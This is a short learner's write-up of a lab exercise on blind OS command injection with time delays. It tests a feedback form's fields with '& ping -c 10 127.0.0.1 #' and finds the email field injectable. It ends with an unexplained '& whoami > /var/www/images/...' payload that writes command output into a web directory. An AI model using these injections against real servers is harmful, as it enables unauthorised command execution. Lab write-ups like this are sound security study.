# lab 2

target goal --Blind OS command injection with time delays

end goal -- To solve the lab, exploit the blind OS command injection vulnerability
to cause a 10 second delay.

now analysis

1. first we check where vulnerability is lies means which parameter is vulnerable

2. then we found suspicisos on submit feedback

csrf=1QH6wPNNhimOevnRmEGda5LfkspOvXRW&name=harami&email=harami
%40gmail.com&subject=haraminess&message=i+am+real+carlos

3. then create a malicious payload

(ya phir) ping -c 10 127.0.0.1 -- this is used to ping with 127.0.0.1 with 10 sec
delay

4.then we check each parameter of submit feedback

5.nothing is in csrf
csrf=1QH6wPNNhimOevnRmEGda5LfkspOvXRW & ping -c 10 127.0.0.1 #
&name=harami&email=harami%40gmail.com &subject=haraminess&message=i+am+real+carlos

6.nothing is in name
csrf=1QH6wPNNhimOevnRmEGda5LfkspOvXRW&name=harami & ping -c 10 127.0.0.1 #
&email=harami%40gmail.com &subject=haraminess&message=i+am+real+carlos

7.when come on email parameter we found the vulnerability

csrf=1QH6wPNNhimOevnRmEGda5LfkspOvXRW&name=harami&email=harami%40gmail.com & ping -
c 10 127.0.0.1 # &subject=haraminess&message=i+am+real+carlos

8. then we encode this & ping -c 10 127.0.0.1 #

& whoami > /var/www/images/radhe.txt #